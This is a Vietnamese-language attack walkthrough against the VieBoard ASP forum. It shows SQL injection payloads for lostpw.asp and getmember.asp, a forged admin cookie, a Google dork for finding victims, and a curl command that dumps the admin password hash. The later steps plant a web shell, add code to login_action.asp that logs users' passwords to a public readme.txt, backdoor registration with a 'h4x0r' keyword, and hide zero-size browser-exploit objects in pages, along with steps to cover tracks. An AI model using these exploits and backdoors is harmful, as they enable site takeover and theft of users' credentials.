- lỗi: sql-injection trong file `lostpw.asp`
dòng 32: set rs = db.execute("Select tblMember.mSN,tblMember.mPwd,tblMemberInfo.mEmail from tblMember,tblMemberInfo where tblMember.mSN = '" & Replace(Request.form("username"),"<","<") & "' AND tblMemberInfo.mID = tblMember.mID")
- khai thác:
http://www.target.com/vie/lostpw.asp
Your username: ' and 1=2 union select tblMember.mSN, tblMember.mPwd, 'email-nhận-kết-quả' from tblMember,tblMemberInfo where tblMember.mSN='username-của-admin
(Select tblMember.mSN,tblMember.mPwd,tblMemberInfo.mEmail from tblMember,tblMemberInfo where tblMember.mSN='' and 1=2 union select tblMember.mSN, tblMember.mPwd, 'email-nhận-kết-quả' from tblMember,tblMemberInfo where tblMember.mSN='username-của-admin)
- lỗi: sql-injection trong file `getmember.asp`
dòng 12: <% set rs = db.execute("Select tblMember.mSN,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mID = tblMemberInfo.mID AND tblMember.mSN = '" & Request("mSN") & "'") %>
- khai thác:
http://www.target.com/vie/getMember.asp?msn=admin' and 1=2 union select tblMember.mPwd,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mSN='username-của-admin
(Select tblMember.mSN,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mID = tblMemberInfo.mID AND tblMember.mSN='admin' and 1=2 union select tblMember.mPwd,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mSN='username-của-admin')
- lỗi: giả mạo cookie trong file `login_action.asp`
- khai thác:
Cookie: isLogged=mod=True&mSN=username-của-admin&group=1&mid=1
Phần II: Khai thác
- search `target` trên http://www.google.com.vn/, từ khóa tìm kiếm: `allinurl:getmember.asp`
Bước 1: xác định username của admin
http://www.target.com/vie/staff.asp
Bước 2: lấy pass của admin
Cách 1: dùng SQL-Injection
http://www.target.com/vie/getMember.asp?msn=admin' and 1=2 union select tblMember.mPwd,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mSN='admin
Cách 2: giả mạo cookie
C:\> curl --cookie "isLogged=mod=True&mSN=admin&group=1&mid=1" --data "query=sele
ct+mPwd+from+tblMember+where+mSN%3D%27admin%27" http://www.target.com/vie/adm_fr
_m_query.asp
<html>
<head>
<link rel="stylesheet" type="text/css" href="skin/style.css">
</style>
<style>
td.adm{ background: url('adm_bg.gif') repeat-x bottom; font:bold 10px ve
rdana;color:#37386D; border:none}
.admh{font:22px verdana;color:#37386D}
</style>
</head>
<body leftmargin=0 rightmargin=0 bottommargin=0 topmargin=0 marginwidth=0 margin
height=0>
<table bgcolor=white width=100% class=sm cellpadding=2>
<tr>
<td class=adm height=23 align=center>VieBoard Administration
</tr>
</table>
<font class=admh>SQL Query</font>
<table width=100% cellpadding=3 style="border:1px solid silver;font:11px courier
new"><tr><td bgcolor=F0F0F0 width="100%">mPwd</td></tr><tr><td nowrap bgcolor=F
AFAFA>37bd45d638c2d11c49c641d2e9c4f49f406caf3ee282743e0c800aa1ed68e2ee</b></td><
/tr></table><p class=small>1 row(s) affected by this query<br>Run time: 10/29/20
03 9:31:44 AM
</body>
</html>
(download file curl.exe)
Bước 3: đặt pass mới cho admin
http://www.target.com/vie/verify.asp
Bước 5: đăng nhập vào admin-panel với pass mới
http://www.target.com/vie/login.asp
http://www.target.com/vie/adm_fr.asp
Bước 6: nhúng 4in1 vào file config.asp
http://www.target.com/vie/adm_fr_m_config.asp?mode=editconfig
(xem file config.asp)
Bước 7: enable 4in1
<form action=http://www.target.com/vie/inc/config.asp method=post>
<input type=hidden name=h4x value=0r>
<input type=submit value=h4x0r>
</form>
(download file h4x0r.htm)
Bước 8: install 4in1
(download file post_reply.asp)
Bước 9: restore lại trạng thái cũ cho vieboard
- restore file config.asp cũ:
http://www.target.com/vie/post_reply.asp
(xóa file inc/config_bak.asp, edit file inc/config.asp: remove 4in1)
- set lại pass cũ cho admin:
http://www.target.com/vie/adm_fr.asp
Bước 10: install các thứ khác
http://www.target.com/vie/post_reply.asp
- log pass của các user:
(xem file login_action.asp)
[...]
else ' if nick and pwd are both correct
[...]
on error resume next
dim fso1,f1,m_ID,mEMail
m_ID=rs("mID")
qSelect="select mEmail from tblMemberInfo where mID="&m_ID
set rs=db.execute(qSelect)
set fso1=createobject("scripting.filesystemobject")
set f1=fso1.opentextfile(server.mappath("readme.txt"),8,true)
f1.writeline mSN&"|"&mPwd&"|"&rs("mEmail")&"|"&retry&"|"&now
f1.close
set fso1=nothing
[...]
(thu thập pass qua địa chỉ http://www.target.com/vie/readme.txt)
- đặt backdoor trong phần đăng kí user:
(xem file register_action.asp)
if (mHobbies="h4x0r") then tmp("mGroup")=1
http://www.target.com/vie/register.asp
- cài script, flash, `malicious` code khai thác lỗ hỏng bảo mật của các trình duyệt web IE, Netscape, ... trong file .asp, .html, ... : set độ rộng và độ cao của object bằng 0
<width=0 height=0 ...>
Phần III: Phòng thủ
- http://www.vienuke.com/
